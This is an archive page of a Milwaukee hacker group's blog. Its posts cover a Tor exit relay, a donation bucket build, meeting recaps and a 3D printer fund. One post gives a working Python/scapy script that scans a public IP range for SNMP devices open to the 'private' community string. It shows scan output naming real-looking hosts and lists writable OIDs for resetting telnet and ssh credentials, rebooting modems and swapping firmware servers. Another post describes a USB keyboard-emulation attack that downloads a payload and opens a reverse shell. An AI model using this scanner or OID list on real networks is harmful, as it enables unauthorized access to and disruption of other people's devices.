For the cause!

Posted on January 3, 2013 by AnarchyAngel

As some of you might know I run a Tor exit relay from my home connection. I got this in the mail the other day:

Hello and welcome to Tor!

We’ve noticed that your Tor node dc414 has been running long enough to be flagged as “stable”. First, we would like to thank you for your contribution to the Tor network! As Tor grows, we require ever more nodes to improve browsing speed and reliability for our users. Your node is helping to serve the millions of Tor clients out there.

As a node operator, you may be interested in the Tor Weather service, which sends important email notifications when a node is down or your version is out of date. We here at Tor consider this service to be vitally important and greatly useful to all node operators. If you’re interested in Tor Weather, please visit the following link to register:

https://weather.torproject.org/

You might also be interested in the tor-announce mailing list, which is a low volume list for announcements of new releases and critical security updates. To join, visit the following address:

https://lists.torproject.org/cgi-bin/mailman/listinfo/tor-announce

Additionally, since you are running as an exit node, you might be interested in Tor’s Legal FAQ for Relay Operators (https://www.torproject.org/eff/tor-legal-faq.html.en) and Mike Perry’s blog post on running an exit node (https://blog.torproject.org/blog/tips-running-exit-node-minimal-harassment).

Thank you again for your contribution to the Tor network! We won’t send you any further emails unless you subscribe.

Disclaimer: If you have no idea why you’re receiving this email, we sincerely apologize! You shouldn’t hear from us again.

Yay my node is now stable!! Now we just need to get one running on the dc414 server 🙂

dc414 donations bucket 2.0

Posted on August 17, 2012 by AnarchyAngel

A while back we started using a bucket to collect cash donations at meetings and for a while I have been wanting to trick it out. So I was keeping an eye out for things to add other then blinking lights, then cmoney came home with a powerball advertisement thing from her gas station that has a electric pendulum thing. I wish I had a picture of it but I didn’t have the for site to take one before I took it apart.

So anyway I got right to work on making the bucket pimp. First I made a little board

with a 555 timer blinking light circuit on it.

put some lights on it and wired the pendulum thing to it.

And hot glued it all to the lid of the bucket.

Here is what it looks like all together.

Ok thats it, I hope you think its cool. If you don’t, go fuck your mom.

August meeting awesomeness

Posted on August 6, 2012 by AnarchyAngel

Klaiviel started us off by giving us a nice show of binary key card hotel locks popular over seas, showed us a 3d printed key for one of his locks, explained pick proof locks from the 40s that are no longer used but highly effective and how to make them today using regular locks. Then he showed us why he is the second best key impressionist in the world, and made a working key for a lock right in front of us and giving us step by step instructions on how to do it our selves.

I stepped in and gave a quick demo of how I made our new and improved donations bucket which I will be making a blog post on later. Darkwind came packing with a alfa wifi antenna hooked up to a satellite dish! This made a killer directional wifi antenna, we took it up to the roof of bucketworks and got signals from all over including the moon 😛 Ngharo hooked it up to his lappy and cracked a few networks 🙂

After the roof party was over and we got back down stairs Castor gave a DEFCON20 badge hacking demo and showed us how to turn our badges into any other badge type we wanted, then showed us how to make the LEDs on the badge flash out words and stuffs. Then we all just started bull shitting and talking about up coming projects.

Cmoney couldnt make it out so I took a few picture that you can view here. Congrats to darkwind and faraday for winning the dc414 free junk giveaway!!

Good times with snmp

Posted on July 18, 2012 by AnarchyAngel

At the last meeting dw5304 gave a demo on snmp scanning and gaining access to things you shouldn’t have access to with a few home brew windows apps he coded up. Its been a while since I messed with snmp but his demo got me back into it, so I made a little python script to scan subnets for open snmp servers with the read/write string set to private. Here is the code:
#! /usr/bin/env python import commands from scapy.all import *

base = "69.2.1." #IP range to scan minus the last octet. f = open('/tmp/snmp_output.txt', 'w+') for i in range(1, 255): ip = base+str(i) print ip+"\n" p = IP(dst=ip)/UDP(dport=161, sport=39445)/SNMP(community="private",PDU=SNMPget(id=1416992799, varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.2.1.1.1.0"))])) pkt = sr1(p, timeout=1) if pkt and pkt.sprintf("%IP.proto%") != "icmp": p1 = pkt.sprintf("%SNMP.PDU%").split("ASN1_STRING['", 1) p2 = p1[1].split("'", 1) print pkt.sprintf("%IP.src%")+" - "+p2[0] f.write(pkt.sprintf("%IP.src%")+" - "+p2[0]+"\n") f.close() print "\nDONE!!!!!!!!!!!!!!!\n"
Its a little hacked together and could use improvement but it works “feel free to send in any improvements you make”. It puts all the found servers IPs in /tmp/snmp_output.txt along with their system description enumerated via snmp. Here is a sample output:
69.1.117.87 - Ruckus Wireless Inc (C) 2006 69.1.117.156 - Ruckus Wireless Inc (C) 2006 69.1.117.190 - Ruckus Wireless Inc (C) 2006 69.1.117.193 - Ruckus Wireless Inc (C) 2006 69.1.117.203 - Ruckus Wireless Inc (C) 2006 69.1.117.221 - Ruckus Wireless Inc (C) 2006 69.1.163.92 - 24-port 10/100 + 2-Port Gigabit Switch with WebView and PoE 69.1.163.93 - Product: GW 4 FXS;SW Version: 5.80A.023.006

Once you find a few servers you can do snmpwalks on them and scour it for juicy info.
Here are some good OIDs to look for and/or set: *found most of this online & got some from dw5304
ip.ipForwarding.0 <-this tells you if its forwarding packets or not "useful to DoS a device" 1.3.6.1.2.1.4.24.2.1.1 <-ipforwardingdest sysName.0 <-device name 1.3.6.1.4.1.4413.2.2.2.1.1.1.4.0 i 1 ... EnableTelnetServer. 1.3.6.1.4.1.4413.2.2.2.1.1.1.1.0....telnetIpStackInterfaces. 1.3.6.1.4.1.4413.2.2.2.1.1.1.2.0....telnetUserName.. 1.3.6.1.4.1.4413.2.2.2.1.1.1.3.0....telnetPassword.. 1.3.6.1.4.1.4413.2.2.2.1.1.1.4.0....telnetServerControl. 1.3.6.1.4.1.4413.2.2.2.1.1.1.5.0....telnetSessionIp. 1.3.6.1.4.1.4413.2.2.2.1.1.1.6.0....telnetSessionInProgress. 1.3.6.1.4.1.4413.2.2.2.1.1.1.7.0....telnetForceUserLogout. 1.3.6.1.2.1.1.1.0 = System Description 1.3.6.1.2.1.1.3.0 = Modem up time 1.3.6.1.2.1.4 = Some useful information (walk) 1.3.6.1.2.1.4.20.1.1.0 = HFC IP (getnext) 1.3.6.1.2.1.4.20.1.3.0 = HFC Subnet (getnext) 1.3.6.1.2.1.2.2.1.6.2= Mac 1.3.6.1.2.1.10.127.1.1.3.1.3.1 = Maximum upload bandwidth 1.3.6.1.2.1.10.127.1.1.3.1.5.1 = Maximum download bandwidth 1.3.6.1.2.1.10.127.1.1.4.1 = Current status (walk) 1.3.6.1.2.1.17.4.3.1.1.0 = Hosts behind modem 1.3.6.1.2.1.69.1.4.4.0 = TFTP Configuration file server IP 1.3.6.1.2.1.69.1.4.5.0 = Configuration file name 1.3.6.1.2.1.69.1.3.5.0 = Current firmware 1.3.6.1.2.1.69.1.4.2.0 = DHCP Server IP 1.3.6.1.2.1.69.1.4.3.0 = Time Server IP 1.3.6.1.2.1.69.1.5.8.1.7 = View Log (walk) 1.3.6.1.2.1.10.127.1.1.1.1.2.3 = Downstream Frequency 1.3.6.1.2.1.69.1.4.5.0 = Image File 1.3.6.1.2.1.17.4.3.1.1 = Learned MAC (Get Next) ---[ Read / Write OIDs 1.3.6.1.2.1.69.1.1.3.0 = Boot modem (1=boot now) 1.3.6.1.2.1.69.1.3.1.0 = TFTP Firmware server IP 1.3.6.1.2.1.69.1.3.2.0 = Firmware filename 1.3.6.1.2.1.69.1.3.3.0 = Firmware update status (1=update now, 2=update on boot,3=disable updates) 1.3.6.1.2.1.69.1.5.2.0 = SNMP Traps server IP (0.0.0.0 = disabled) 1.3.6.1.2.1.69.1.5.3.0 = SNMP Traps status (1=enabled, 4=disabled) 1.3.6.1.4.1.1166.1.19.3.1.14.0 = SNMP Port 1.3.6.1.4.1.1166.1.19.3.1.15.0 = SNMP Traps port 1.3.6.1.4.1.1166.1.19.3.1.17.0 = HTML Server status (1=enabled, 2=disabled)Other OIDs 1.3.6.1.2.1.1.5.0 = modem type 1.3.6.1.3.83.1.1.4.0 = Cable Modem Serial Number 1.3.6.1.3.83.1.4.5.0 = Alternate OID for Config File 1.3.6.1.3.83.1.4.3.0 = Provisional Server 1.3.6.1.2.1.1.6.0 = Area String 1.3.6.1.2.1.4.20.1.3+(hfc ip) = Subnet Example 1.3.6.1.2.4.20.1.3.10.169.53.2451.3.6.1.3.103.1.5.1.3.1.5 = CPE USB MAC 1.3.6.1.2.1.2.2.1.6.1 = Cable Modem USB MAC 1.3.1.6.1.2.1.10.127.1.2.1.1.1.2 = Default Gateway MAC Address 1.3.6.1.2.1.2.10.127.1.1.3.1.6.1 = Max Burst Up 1.3.6.1.2.1.2.2.1.6.5 = CPE MAC 1.3.6.1.4.1.1166.1.19.3.1.17.0Ii 1 or 0 enable or disable webif 1.3.6.1.4.1.4413.2.2.2.1.1.4.1 =”reflects the IP stack interfaces on which a ssh 1.3.6.1.4.1.4413.2.2.2.1.1.4.2 = "reflects the user name which will be allowed ssh access." 1.3.6.1.4.1.4413.2.2.2.1.1.4.3 = "reflects the password which will be allowed ssh access." 1.3.6.1.4.1.4413.2.2.2.1.1.4.4 = "start or stop the ssh server. 1.3.6.1.4.1.4413.2.2.2.1.1.4.7 =terminate ssh session

You can find a lot more online. Enjoy and happy hacking 🙂

Arduino Windows Attack Tool

Posted on June 11, 2012 by AnarchyAngel

A few meetings back I demoed my Arduino Windows attack tool. The Arduino and shield emulate a keyboard when plugged into a PC. Once triggered it opens the DOS edit program, writes some vbscript to a file called go.vbs, then runs it using wscript. The script downloads a payload from a web server. In the case of the demo it was a reverse shell that connects back to a nc listener from msf. I got the idea from the Social-Engineering Toolkit Teensy USB HID Attack but I dont have/want a teensy so I looked and looked for an Arduino version but all I could find was a USB keyboard lib, so my value add was porting it to the Arduino.

Here is the USB lib I used.

Here is the schematic for the shield: *I added a button on pin 12

Here is the code for the Arduino:

And there you have it, my Arduino Windows attack tool. Its a little messy and hacked together, but it works. Enjoy 🙂

Many thanx to SilkyPantsDan, Rancid Bacon, and Practical Arduino

3D Printer Fund

Posted on June 6, 2012 by ngharo

There has been a lot of buzz about 3D printers over the last year. Prices are coming down and resolution has been increasing. Klaiviel, our resident lockpicking guru, is attempting to start a business around it. We feel that DC414 as a whole needs their hands on this technology. We’re starting a 3D printer fund starting now.

There are many options to go with but we want to get the ball rolling while research is happening in parallel. Price range we’re looking at is between $500 and $1,000 for quality printers.

This won’t happen without help from people like you. Once purchases / assembled / hacked, our goal is to make the printer accept jobs from online. We’d queue up jobs and have a webcam feed to view progress when printing remotely. Notifications would be sent out to the author upon start, completion, and possibly other metrics we can get out of the printer.

Donate $25+ gets you free stickers
Donate $50+ gets you a free shirt
Donate $100+ gets you free prints for 6 months
Donate $150+ gets you free prints and priority for 6 months

Any size donation gets you on the thank you list.

As of now we have $233 in the fund. Make your donation now (look to the right) and lets get this ball rolling.

June meeting recap

Posted on June 4, 2012 by AnarchyAngel

June’s meeting was great! More new faces, lots of beer, and plenty of pizza 🙂 Ngharo got things started by making a few announcements like our new VPN that is available for donating members, and asking everyone what they are hacking ATM and what they wanna hack next. I was up next and talked about the new server and some of the sections of the site. Then Ulic gave us all the 411 on the Flamer virus sweeping the middle east and some of its unique features. dw5304 took over and gave a sweet demo on how to hack/mod the xbox360, complete with code and points of solder. We got some great pictures this time thanx to cmoney which you can view here. Congrats to nikto, Tony, and Ulic for winning the dc414 free junk giveaway.

Here is nikto and his dc414 junk 🙂

Computer Hacker skillz badge is here!

Posted on June 2, 2012 by AnarchyAngel

The computer Hacker skillz badge is done! Get yours and start working on the achievements now!!

May meeting recap.

Posted on May 6, 2012 by AnarchyAngel

May’s meeting was off the hook, one of our best yet! Lots of new faces which is always nice, good demos, and good beer. Ngharo started it off by talking about the hackathon and THOTCON. Klaiviel did his lock master thing and said a few words about TOOOL. Darkwind gave a awesome demo on sniffing pagers. Its crazy to see all the pager traffic that is still out there. Then I showed off my Arduino windows attack tool and pwned a windows 7 box, There will a blog post about that later. Congrats to Genero for winning the dc414 free junk giveaway! I did take a bunch of pictures but my phone was full of fail and didn’t save any of them 🙁 so no pictures of the meeting this time, sorry. I promise to do better next time 😛 later.

Hardware Hacker skillz badge preview

Posted on April 23, 2012 by AnarchyAngel

Just got this one finshed, bask in its leetness.

dc414

Your Milwaukee Area Hacker Group.

Category Archives: projects